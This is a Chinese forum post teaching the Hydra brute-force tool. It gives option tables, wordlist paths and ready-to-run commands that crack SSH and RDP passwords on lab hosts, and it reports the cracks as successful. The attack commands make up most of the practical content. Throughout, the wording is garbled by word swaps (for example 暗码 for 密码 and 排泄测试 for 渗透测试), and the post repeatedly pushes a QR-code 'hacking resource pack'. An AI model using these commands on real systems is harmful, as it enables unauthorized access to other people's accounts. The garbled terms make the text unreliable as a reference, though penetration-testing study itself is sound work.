Hydra(海德拉)工具使用从0到1,爆破服务器暗码,2024最新版使用教程发起 ...

农民  论坛元老 | 2025-4-10 23:39:11 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 1722|帖子 1722|积分 5166

Hydra简介

Hydra又叫九头蛇,是一款由著名的黑客组织THC开发的开源暴力破解工具,支持大部分协议的在线暗码破解,是网络安全·排泄测试必备的一款工具,目前支持的协议包罗
   Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP。
  在kali体系中自带有hydra九头蛇工具
我给大家预备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

常用参数列表

选项描述-R规复先前停止/瓦解的会话-I忽略现有的还原文件(不要等待10秒)-S执行SSL连接-s PORT如果服务在不同的默认端口上,则在这里定义它-l LOGIN or -L FILE使用指定登录名登录,大概使用文件加载多个登录名-p PASS or -P FILE使用指定暗码登录,大概使用文件加载多个暗码-x MIN:MAX:CHARSET暗码暴力生成, 使用’-x -h‘获取资助-y暴力破解时忽略符号,见上文-e nsr可选选项,n:空暗码试探,s:使用指定用户和暗码试探,或“r”反向登录-u循环用户,而不是暗码(有用!用-x表现)-C FILE使用冒号分割格式,例如“登录名:暗码”来代替 -L/-P 参数-M FILE要攻击的服务器列表,每行一个条目,':'指定端口-o FILE将找到的登录名/暗码对写入FILE而不是输出-b FORMAT指定-o文件的格式:text(默认),json, jsonv1-f / -F当找到login/pass对时退出(-M: -f per host, -f global)-t TASKS同时运行的线程数,默以为16-T TASKSrun TASKS connects in parallel overall (for -M, default: 64)-w / -W TIME设置最大超时的时间,单元秒,默认是30s-c TIME全部线程上每次登录实行的等待时间(逼迫执行-t 1)-4 / -6使用IPv4(默认)/ IPv6地址(将always放在[]中,也放在-M中)-v / -V / -d具体模式/每次实行显示登录+通过/调试模式-O使用旧的SSL v2和v3-K不重做失败的实行(实用于-M批量扫描)-q不打印有关连接错误的消息-U服务模块使用详情-m OPT选项特定于模块,请参见-U output获取信息-h更多命令行选项(资助)server目的NS、IP或192.168.0.0/24(这个或-M选项)service指定服务名,支持的服务和协议OPT一些服务模块支持额外输入(-U表现模块资助) 在hydra的资助命令中官方我们提供了一些示例如下
  1. hydra -l user -P passlist.txt ftp://192.168.0.1
  2. hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  3. hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  4. hydra -l admin -p password ftp://[192.168.0.0/24]/
  5. hydra -L logins.txt -P pws.txt -M targets.txt ssh
复制代码
这些命令基本用法用起来大体上很雷同,我们以第一个命令为例,大体上可以分成三部分,即用户名,暗码,和协议

kali自带暗码字典

在kail中是自带字典的,可以通过/usr/share/wordlists/dirb路径举行查看,当然都是txt文件,也可以自己向内里添加。

包含各种类型的字典,用于暗码爆破、毛病扫描等,他们的常用用途如下
   big.txt #大的字典 small.txt #小的字典 catala.txt #项目配置字典 common.txt #公共字典 euskera.txt #数据目次字典 extensions_common.txt #常用文件扩展名字典 indexes.txt #首页字典 mutations_common.txt #备份扩展名 spanish.txt #方法名或库目次 others #扩展目次,默认用户名等 stress #压力测试 vulns #毛病测试
  Hydra暗码生成器

参数先容-x MIN:MAX:CHARSET规则:MIN表现生成暗码的最短长度;MAX表现生成暗码的最长长度;CHARSET表现使用指定的字符生成暗码,'a’表现全部的小写字母,'A’表现全部的大写字母,'1’表现全部的数字,对于其他字符,只需要添加在反面即可-y使用方式见-x,它表现charset的字符是现实的字符,而不是正则表达式-x 3:5:a生成的暗码字典长度为3到5位,由全部的小写字母组成-x 5:8:A1生成的暗码字典长度为5到8位,有全部的大写字母和数字组成-x 5:5/%,.-生成的暗码字典长度为5位,只由’/ % , . -'这5种字符构成-x 3:5:aA1 -y生成的暗码字典长度为3到5位,且只由’a A 1’这三种字符组成-x 3:5:aA1.-+#生成的暗码字典长度为3到8位,由大小写字母+数字+.-+#举行组合。 爆破SSH

  1. hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t ip  ssh -s 22   
  2. #-L 指定用户字典文件
  3. #-P 指定密码字典文件  
  4. #-o 把成功的输出到ssh.txt文件
  5. #-vV 显示详细信息  
  6. #-s 指定其他端口 如果要修改默认22端口,可以使用 -s 参数
复制代码
先创建一个暗码字典,手动编写暗码(测试即可,真实排泄环境自行使用大型字典)

创建一个用户字典

预备一台centos主机,查看ip地址,确保kali体系和centos体系处于同一网段下

举行爆破
  1. hydra -L user.txt -P pwd.txt -vV -o ssh.txt -t 5 192.168.209.138 ssh
复制代码

破解成功,4个暗码有用

也可以在输出的ssh.txt查看用户暗码

我给大家预备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

爆破RDP

linux体系爆破成功,那么下面试试windows吧

Tips:windows使用的远程协议是rdp协议,我们直接将上面的命令协议改为rdp即可
  1. hydra -L user.txt -P pwd.txt -vV -o ssh.txt -t 5 192.168.209.129 rdp
复制代码

爆破成功,实行使用暗码连接即可


免责声明:使用本教程或工具,用户必须服从全部实用的法律和法规,并且用户应自行负担全部风险和责任。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

农民

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表